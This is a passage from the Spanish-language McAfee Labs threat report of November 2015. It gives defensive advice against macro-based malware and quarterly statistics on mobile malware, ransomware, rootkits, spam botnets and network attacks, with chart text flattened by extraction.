(Aquí encontrará más información sobre Evoltin). Conclusión Aunque el uso de las macros para distribuir malware no es una novedad, las macros actuales son más eficaces y flexibles, gracias al empleo de funciones como PowerShell. Ya hace tiempo que los autores de malware emplean las macros debido a su simplicidad, facilidad de codificación y otras ventajas para atacar a las víctimas y propagar el malware. Los autores de malware utilizan técnicas de ingeniería social para infectar a un gran número de usuarios. Generalmente, no es necesario activar las macros para ver el contenido de un documento. Si recibe un documento de este tipo, tenga cuidado. Es fácil escapar a estos engaños si se conoce la amenaza. Prevención La medida más importante para proteger a los usuarios contra el malware basado en macros es mantenerles al corriente del problema y de los medios de propagación. La formación de los usuarios ayuda a fomentar la concienciación sobre el problema. Hay algunas otras medidas que usuarios y empresas pueden tomar para protegerse y evitar convertirse en víctimas. Es necesario tener en cuenta el nivel de seguridad que requiere cada aplicación. Por ejemplo, es improbable que PowerPoint utilice macros, por lo tanto sus usuarios pueden desactivar esta función. Los servidores de correo electrónico y los analizadores de virus se pueden configurar para que filtren el tráfico del correo con el fin de localizar adjuntos que contengan macros y, por ejemplo, muestren un mensaje de advertencia al destinatario. Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 46 Temas principales McAfee Labs recomienda las siguientes medidas para luchar contra los ataques de malware basados en macros: Descubra cómo puede protegerle Intel Security frente a esta amenaza. ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ ■■ Active las actualizaciones automáticas de los sistemas operativos o descargue con regularidad las actualizaciones para que estos cuenten con los parches necesarios para estar protegidos frente a las vulnerabilidades conocidas. Configure el software antimalware para que analice automáticamente los archivos adjuntos de todos los mensajes instantáneos y de correo electrónico. Asegúrese de que los programas de correo electrónico no abran automáticamente los archivos adjuntos ni procesen automáticamente los gráficos, así como de que el panel de vista previa esté desactivado. Establezca la configuración de seguridad del navegador como mínimo al nivel medio. Preste especial atención al abrir adjuntos, sobre todo si tienen la extensión .doc o .xls. No abra nunca mensajes de correo electrónico no deseados ni archivos adjuntos que no esperaba recibir, incluso aunque provengan de personas que conoce. Tenga cuidado con el phishing basado en spam. No haga clic en enlaces de mensajes instantáneos o de correo electrónico. Controle los pings no previstos dirigidos a direcciones IP como 1.3.1.2 o 2.2.1.1, etc. desde ordenadores internos. Tenga en cuenta que normalmente las facturas y recibos no necesitan macros. Utilice el software de Microsoft Office actualizado, que ofrece mejor protección frente a este tipo de ataques. Desconfíe de los documentos vacíos que piden a los usuarios activar las macros para ver el contenido. Compruebe que en la configuración predeterminada de la seguridad de macros en los productos de Office se ha seleccionado el nivel alto. Si desea saber cómo detectan los productos de Intel Security el malware para macros, haga clic aquí. Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 47 Estadísticas sobre amenazas Amenazas contra dispositivos móviles Malware Amenazas web Ataques a redes Compartir opinión Estadísticas sobre amenazas Amenazas contra dispositivos móviles Nuevo paramóviles móviles Nuevomalware malware para 1 400 000 Las nuevas muestras de malware para móviles siguen aumentando. Las infecciones han aumentado también, pero no al mismo ritmo, debido a las mejoras en las defensas del sistema operativo. El aumento del número de muestras puede reflejar los intentos por parte de los agresores de sortear las defensas. 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Total paramóviles móviles Totalde demalware malware para 10 000 000 9 000 000 8 000 000 7 000 000 6 000 000 5 000 000 4 000 000 3 000 000 2 000 000 1 000 000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 49 Estadísticas sobre amenazas Tasas de infección por malware para móviles por regiones (3.er trimestre de 2015) 14 % 12 % 10 % 8% 6% 4% 2% 0 África Asia Australia Europa Norteamérica América del Sur Fuente: McAfee Labs, 2015 Tasas mundiales de infección por malware para móviles 22 % 20 % 18 % 16 % 14 % 12 % 10 % 8% 6% 4% 2% 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 50 Estadísticas sobre amenazas Malware Nuevo malware 50 000 000 El "zoo" de nuevo malware de McAfee Labs se redujo un 4 % este trimestre, probablemente debido a la gran variedad del número de parásitos. 45 000 000 40 000 000 35 000 000 30 000 000 25 000 000 20 000 000 15 000 000 10 000 000 5 000 000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Malware total 500 000 000 El implacable aumento del malware sigue adelante. Esperamos cruzar la barrera de 500 000 millones para finales de 2015. 450 000 000 400 000 000 350 000 000 300 000 000 250 000 000 200 000 000 150 000 000 100 000 000 50 000 000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 51 Estadísticas sobre amenazas Nuevos New Rootkitrootkits Malware 100 000 El nuevo malware de tipo rootkit se redujo un 65 %, llegando a su nivel más bajo desde 2008. Este descenso se debe probablemente a que han disminuido los beneficios que reporta a los agresores. Con Windows de 64 bits, Microsoft pone en práctica las firmas de controladores e incluye PatchGuard, que complica a los agresores considerablemente la manipulación del kernel. El repunte en el primer y el segundo trimestre de 2014 se debió a una sola familia de rootkit que aparentemente desapareció. 90 000 80 000 70 000 60 000 50 000 40 000 30 000 20 000 10 000 0 Q4 2013 Q1 Q2 2014 Q3 Q4 Q1 Q2 2015 Q3 Fuente: McAfee Labs, 2015 Total de malware tipo rootkit Total Rootkit de Malware 1 800 000 1 600 000 1 400 000 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 Q4 2013 Q1 Q2 2014 Q3 Q4 Q1 Q2 2015 Q3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 52 Estadísticas sobre amenazas Nuevo ransomware New Ransomware 1 400 000 Las nuevas muestras de ransomware se han reducido un 40 % en el 3.er trimestre. El incremento en el 2.º trimestre se debió a Virus.Win32.PolyRansom.f, una familia de ransomware parásito que alteró el recuento total debido a la rápida creación de nuevas variantes. 1 200 000 1 000 000 800 000 600 000 400 000 200 000 0 Q4 2013 Q1 Q2 2014 Q3 Q4 Q1 Q2 2015 Q3 Fuente: McAfee Labs, 2015 Total ransomware Totalde Ransomware 5 500 000 5 000 000 4 500 000 4 000 000 3 500 000 3 000 000 2 500 000 2 000 000 1 500 000 1 000 000 500 000 0 Q4 2013 Q1 Q2 2014 Q3 Q4 Q1 Q2 2015 Q3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 53 Estadísticas sobre amenazas Nuevos archivos binarios firmados New Malicious Signed Binariesmaliciosos 2 500 000 En el 3. trimestre descendieron un 26 % los nuevos binarios firmados maliciosos, justo la mitad del número recopilado en el 2.º trimestre en 2014. er 2 250 000 2 000 000 1 750 000 1 500 000 1 250 000 1 000 000 750 000 500 000 250 000 0 Q4 2013 Q1 Q2 2014 Q3 Q4 Q1 Q2 2015 Q3 Fuente: McAfee Labs, 2015 Total de archivos binarios firmados maliciosos 20 000 000 17 500 000 15 000 000 12 500 000 10 000 000 7 500 000 5 000 000 2 500 000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 54 Estadísticas sobre amenazas Nuevo malware para Mac OS 30 000 Los autores de malware se dirigen cada vez más a la plataforma Mac. A partir de este informe comenzamos a seguir el malware que ataca al sistema operativo Mac OS. En comparación con el 2.º trimestre, en el tercer trimestre se ha registrado cuatro veces más malware para Mac OS. La mayor parte de este incremento puede atribuirse a una sola amenaza. 25 000 20 000 15 000 10 000 5000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Total de malware para Mac OS 60 000 55 000 50 000 45 000 40 000 35 000 30 000 25 000 20 000 15 000 10 000 5000 0 T4 2013 T1 T2 2014 T3 T4 T1 T2 2015 T3 Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 55 Estadísticas sobre amenazas Amenazas web Nuevas URL sospechosas 35 000 000 30 000 000 25 000 000 20 000 000 15 000 000 10 000 000 5 000 000 0 T4 2013 T1 URL T2 2014 T3 T4 T1 T2 2015 T3 Dominios asociados Fuente: McAfee Labs, 2015 Nuevas URL de phishing 2 500 000 2 250 000 2 000 000 1 750 000 1 500 000 1 250 000 1 000 000 750 000 500 000 250 000 0 T4 2013 URL T1 T2 2014 T3 T4 T1 T2 2015 T3 Dominios asociados Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 56 Estadísticas sobre amenazas Nuevas URL de spam 2 500 000 2 000 000 1 500 000 1 000 000 500 000 0 T4 2013 T1 URL T2 2014 T3 T4 T1 T2 2015 T3 Dominios asociados Fuente: McAfee Labs, 2015 Volumen global de spam y correo electrónico (billones de mensajes) 11,0 10,0 9,0 8,0 7,0 6,0 5,0 4,0 3,0 2,0 1,0 0 T4 2013 Spam T1 T2 2014 T3 T4 T1 T2 2015 T3 Correo electrónico legítimo Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 57 Estadísticas sobre amenazas Mensajes de spam de las 10 redes de bots principales (millones de mensajes) 1400 Tras estar inactiva durante los dos últimos trimestres, Kelihos, que ofrece bienes de consumo y productos farmacéuticos falsos, reclama la primera posición en el ranking de redes de bots de envío de spam. Aunque el volumen de redes de bots sigue bajo si se compara con 2014, McAfee Labs ha realizado hace poco mejoras incrementales en nuestra telemetría. Como resultado, el volumen para el tercer trimestre ha aumentado ligeramente. 1200 1000 800 600 400 200 0 T4 2013 T1 T2 2014 T3 T4 Kelihos Darkmailer Dyre Slenfbot Cutwail Lethic Gamut Asprox Stealrat T1 T2 2015 T3 Otros Fuente: McAfee Labs, 2015 Prevalencia de redes de bots a nivel mundial (3.er trimestre de 2015) Wapomi se propaga como un gusano e infecta archivos .exe. Además, intenta descargar otros archivos que crean un ataque de denegación de servicio distribuido. Su popularidad se debe a esta frecuente propagación. Sin embargo, muchos de los servidores de control que requiere ya son inalcanzables debido a los sinkholes DNS. Wapomi Muieblackcat 21 % 29 % 2% Sality Ramnit 3% Maazben 4% 5% 14 % 8% 12 % Darkness NGRBot H-Worm Otros Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 58 Estadísticas sobre amenazas Principales países que albergan servidores de control de redes de bots (3.er trimestre de 2015) Estados Unidos China Alemania 26 % Brasil 38 % Rusia 6% 5% 4%4% 4% 4% 5% Países Bajos Corea del Sur Argelia Francia Otros Fuente: McAfee Labs, 2015 Ataques a redes Principales ataques a redes (3.er trimestre de 2015) Denegación de servicio Navegador 19 % 1% 2% 2% 30 % Fuerza bruta SSL 2% Análisis 5% Red de bots 16 % 23 % Shellshock Puerta trasera Otros Fuente: McAfee Labs, 2015 Comparta este informe Informe sobre amenazas de McAfee Labs, noviembre de 2015 | 59 Acerca de Intel Security Comentarios. Para saber en qué dirección orientarnos, nos interesan sus opiniones. Si desea transmitirnos sus impresiones, haga clic aquí para completar un rápido cuestionario de solo cinco minutos sobre el informe de amenazas. Siga a McAfee Labs McAfee. Part of Intel Security. Avenida de Bruselas n.° 22 Edificio Sauce 28108 Alcobendas Madrid, España Teléfono: +34 91 347 8500 www.intelsecurity.com McAfee forma ahora parte de Intel Security. Con su estrategia Security Connected, su innovador enfoque de seguridad reforzada por hardware y su exclusiva red Global Threat Intelligence, Intel Security trabaja sin descanso para desarrollar soluciones y servicios de seguridad proactivos que protejan los sistemas, las redes y los dispositivos móviles de uso personal y empresarial en todo el mundo. Intel Security combina la experiencia y los conocimientos de McAfee con la innovación y el rendimiento demostrados de Intel para hacer de la seguridad un ingrediente fundamental en todas las arquitecturas y plataformas informáticas. La misión de Intel Security es brindar a todos la tranquilidad para vivir y trabajar de forma segura en el mundo digital. www.intelsecurity.com La información de este documento se proporciona únicamente con fines informativos y para la conveniencia de los clientes de McAfee. La información aquí contenida está sujeta a cambio sin previo aviso, y se proporciona "tal cual" sin garantías respecto a su exactitud o a su relevancia para cualquier situación o circunstancia concreta. Intel y los logotipos de Intel y de McAfee son marcas comerciales de Intel Corporation o de McAfee, Inc. en EE. UU. y/o en otros países. Los demás nombres y marcas pueden ser reclamados como propiedad de otros. Copyright © 2015 Intel Corporation. 62189rpt_nov-threats_1215